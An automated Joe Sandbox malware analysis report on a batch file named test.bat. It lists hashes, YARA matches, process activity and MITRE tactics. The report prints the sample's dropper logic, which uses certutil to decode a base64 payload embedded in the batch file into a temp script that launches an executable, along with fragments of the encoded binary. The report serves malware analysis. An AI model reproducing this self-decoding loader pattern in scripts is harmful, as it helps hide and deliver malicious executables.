Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.bat

Overview

General Information

Sample Name:test.bat
Analysis ID:876994
MD5:7e1348c4cc1ddab3b771afb1dd4c9cc2
SHA1:b395aa85edf28a8852ede1d2a59e964584a4fc7f
SHA256:6f308d6ea87ba7a786e0868014d018a928b4cabc4d354d67e8e1d7f3e7eb9cc7
Tags:bat
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mode.com (PID: 7308 cmdline: Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C)
    • certutil.exe (PID: 7328 cmdline: CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat" MD5: EB199893441CED4BBBCB547FE411CF2D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
test.batSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth (Nextron Systems)
  • 0x158:$: VFZxUUFBT
SourceRuleDescriptionAuthorStrings
00000003.00000003.554928918.00000185629B1000.00000004.00000020.00020000.00000000.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth (Nextron Systems)
  • 0x198:$: VFZxUUFBT
Process Memory Space: certutil.exe PID: 7328SUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth (Nextron Systems)
  • 0x807ea:$: VFZxUUFBT
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: test.bat, type: SAMPLEMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth (Nextron Systems), description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.554928918.00000185629B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth (Nextron Systems), description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: certutil.exe PID: 7328, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth (Nextron Systems), description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\AppData\Local\Temp\1.batJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" "
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_01
Source: C:\Windows\System32\mode.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: classification engineClassification label: clean1.winBAT@6/2@0/0
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat" Jump to behavior
Source: test.batStatic file information: File size 6175325 > 1048576
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: 1.bat.3.drBinary or memory string: ZisBFgsCKDMiAAYtLAJvMCIABgwHCG8nIgAGb5gEAAofEVphCwcIbygiAAZvmAQA
Source: 1.bat.3.drBinary or memory string: MtoRBBEFbzofAAYTBgYRBm8MHwAGWR8wWSUYWxdYCAcoKToABhMHGFsXWAgHKCk6
Source: 1.bat.3.drBinary or memory string: EQ5vxSEABiwXEQ1vxSEABiwHAm9HIgAGKgZvYyEABioIb8UhAAY5pgAAAAJvMCIA
Source: 1.bat.3.drBinary or memory string: IQAGDQkIb0giAAZvMCIABiVvMyIABiwLcpuAA3BzbgIACnpvJSIABm+3IQAGKooD
Source: 1.bat.3.drBinary or memory string: KgZvYyEABioIb8UhAAY5pgAAAAJvMCIABiVvJyIABgtvKCIABhMSEQUTExESERNv
Source: 1.bat.3.drBinary or memory string: KgZvYyEABioIb8UhAAY5oQAAAAJvMCIABiVvJyIABgtvKCIABhMSEQUTExESERNv
Source: 1.bat.3.drBinary or memory string: BhMEAnsjFwAEb4I1AAYEEQQJKDohAAZvMCIABhMFEQVvMyIABiwCFioDCBEFbyUi
Source: 1.bat.3.drBinary or memory string: KgZvYyEABioIb8UhAAY5rAAAAAJvMCIABiVvJyIABgtvKCIABhMSEQUTExESERNv
Source: 1.bat.3.drBinary or memory string: BiwHAm9HIgAGKgZvYyEABioIb8UhAAY5sAAAAAJvMCIABiVvJyIABnTRBAACC28o
Source: 1.bat.3.drBinary or memory string: EQ5vxSEABiwXEQ1vxSEABiwHAm9HIgAGKgZvYyEABioIb8UhAAY5nAAAAAJvMCIA
Source: 1.bat.3.drBinary or memory string: EjEsR2qZrsh/+U9dlm/0szkh2pyFnjvwv+8G7uVfIBDMPFRKUpQOwCj2VmCi4w/s
Source: 1.bat.3.drBinary or memory string: BytECSwLEQZvMCIABhMGKzYGB29uIQAGLQIWKhiNEAQAAiUWAqIlFwYRB29gIQAG
Source: 1.bat.3.drBinary or memory string: tAAAAAJvMCIABiVvJyIABnTRBAACC28oIgAGExYRBRMXERYRF2+6IQAGB2++IQAG
Source: 1.bat.3.drBinary or memory string: KDohAAZvMCIABioAEzAFADUBAAADCAARAntiHgAEb2AtAAYKGgYopwUACo0qAAAB
Source: 1.bat.3.drBinary or memory string: c1wCAAp6AhZzXgUACgoGKC8zAAYLBxgyBQcXXywIHzJz1zEABnoHGFsGKD4zAAYG
Source: 1.bat.3.drBinary or memory string: EzACAFMAAAAAAAAAAy0Qcg/XAnBy69kCcHPVAgAKegIDKDwhAAZvMCIABhABA28z
Source: 1.bat.3.drBinary or memory string: CgoGKC8zAAYLBxgyBQcXXywIHzJz1zEABnoHGFsGKD4zAAYGKDozAAYMBihDMgAG
Source: 1.bat.3.drBinary or memory string: b1EhAAYt0xYqEQVvMCIABm8lIgAGb7chAAYGbyYfAAYEb5cEAAoqABMwAwAoAAAA
Source: 1.bat.3.drBinary or memory string: b9kjAAZvMCIABn1HGAAEAgV9SBgABAIHBm+CNQAGBW+sNQAGb9kjAAZvMCIABn1J
Source: 1.bat.3.drBinary or memory string: xSEABiwHAm9HIgAGKgZvYyEABioIb8UhAAY5nAAAAAJvMCIABiVvJyIABgtvKCIA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat" Jump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting
Path Interception11
Process Injection
11
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Scripting
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 876994 Sample: test.bat Startdate: 28/05/2023 Architecture: WINDOWS Score: 1 5 cmd.exe 1 1 2->5         started        process3 7 conhost.exe 5->7         started        9 certutil.exe 3 2 5->9         started        11 mode.com 1 5->11         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
test.bat3%ReversingLabsWin32.Trojan.Generic
test.bat7%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox Version:37.1.0 Beryl
Analysis ID:876994
Start date and time:2023-05-28 09:32:19 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:test.bat
Detection:CLEAN
Classification:clean1.winBAT@6/2@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .bat
  • Stop behavior analysis, all processes terminated
  • Not all processes where analyzed, report is missing behavior information
No simulations
No context
No context
No context
No context
No context
Process:C:\Windows\System32\certutil.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4490960
Entropy (8bit):5.084469480252474
Encrypted:false
SSDEEP:24576:gUMlU9gRTCyXsYpmM5uXnR4r5ZVeeSZNpE8ybnuSjPJeMMKz1OiPYQ8huXwN9JKG:JKcu6ep4PHAL4jVYC2/ig+
MD5:25978F2599F1B076B115175A8F557392
SHA1:3441D1B82C073217A76826C79A75C85355EECE29
SHA-256:54B229E2CA59E0421FF71D5DF7F344D567A3B77D8472B8F690DDAB0A3839A955
SHA-512:66B4DE8F20456C43244058AAE45FDB9DE9E80F21C450EE233D5F4F149C9EC8AD8F6BEFE870F12829A936EA80A6660D600BDEA87483DA203E4EB3619DC936075B
Malicious:false
Reputation:low
Preview:@echo off..Start "Client-built" "Client-built.exe"..Exit..-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAOf6DWQAAAAA..AAAAAOAAAgELAQgAAMYxAAAOAAAAAAAA/uMxAAAgAAAAAAAAAABAAAAgAAAAAgAA..BAAAAAAAAAAEAAAAAAAAAABAMgAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAA..AAAAABAAAAAAAAAAAAAAALDjMQBLAAAAAAAyAJMKAAAAAAAAAAAAAAAAAAAAAAAA..ACAyAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA..BMQxAAAgAAAAxjEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJMKAAAAADIA..AAwAAADIMQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAACAyAAACAAAA1DEA..AAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADg4zEAAAAAAEgAAAACAAUA..ENYXAKANGgABAAAAAQAABpxrFgBwAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAABMwAwBNAAAAAAAAACAADAAAKAEAAAoYKAIAAAoU/gYC..AAAGcwMAAAooBAAACigFAAAKFP4GAwAABnMGAAAKbwcAAAooCAAAChY
Process:C:\Windows\System32\certutil.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):100
Entropy (8bit):4.894177320667445
Encrypted:false
SSDEEP:3:qOYFTUxovF6M+YFRRcTwqRF8jxd1ELzdUA2AGN8cv:q3eWnFcCxILxUANGN8e
MD5:9C411874FFF521EF1CEBAA7F35890C52
SHA1:CB963C0D48F92C6C5D601F68D7D56ECC19411239
SHA-256:FF1208CD7D8DC8A23757389FA46955CDA31B024EF5180D4A5EC854BF319DFBEC
SHA-512:4D7727CE7C0F5383F06F96FFD115EA9AF22A53B14B7C6C6FAC448B18DCF12F915A8C99BAC29580B853A97B0A5DDBA767FB3556453EA290715CF0E3E6B2D5F307
Malicious:false
Preview:Input Length = 6175325..Output Length = 4490960..CertUtil: -decode command completed successfully...
File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
Entropy (8bit):5.20450028605933
TrID:
  • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
  • Text - UTF-16 (LE) encoded (2002/1) 36.37%
  • MP3 audio (1001/1) 18.19%
File name:test.bat
File size:6175325
MD5:7e1348c4cc1ddab3b771afb1dd4c9cc2
SHA1:b395aa85edf28a8852ede1d2a59e964584a4fc7f
SHA256:6f308d6ea87ba7a786e0868014d018a928b4cabc4d354d67e8e1d7f3e7eb9cc7
SHA512:8cd7db51c75e37a3191141632485922d20eecefb16d94aa8629aad3b1951b18e09baa599b5b0c99137262ef34a1fb3414137fcc5ccc5f21e9cf3fa9654a6aa6c
SSDEEP:49152:G4duV2eLoRzGGqGLDw3jF/8ahdU79QVCp4:+
TLSH:DE563C60AF88654DB2881D8BF02E695AB5F32B86C9B3B2CCE343780FB95FD1D3515845
File Content Preview:..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\1.bat" >nul 2>&1 ..cls.."%Temp%\1.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpTdGFydCAiQ2xpZ
Icon Hash:9686878b929a9886
No network behavior found

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Click to jump to process

Target ID:0
Start time:09:33:20
Start date:28/05/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" "
Imagebase:0x7ff632260000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:1
Start time:09:33:20
Start date:28/05/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c72c0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:2
Start time:09:33:21
Start date:28/05/2023
Path:C:\Windows\System32\mode.com
Wow64 process (32bit):false
Commandline:Mode 60,3
Imagebase:0x7ff7ae380000
File size:31232 bytes
MD5 hash:1A3D2D975EB4A5AF22768F1E23C9A83C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:3
Start time:09:33:21
Start date:28/05/2023
Path:C:\Windows\System32\certutil.exe
Wow64 process (32bit):false
Commandline:CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat"
Imagebase:0x7ff6f6a00000
File size:1557504 bytes
MD5 hash:EB199893441CED4BBBCB547FE411CF2D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
  • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000003.00000003.554928918.00000185629B1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
Reputation:moderate

No disassembly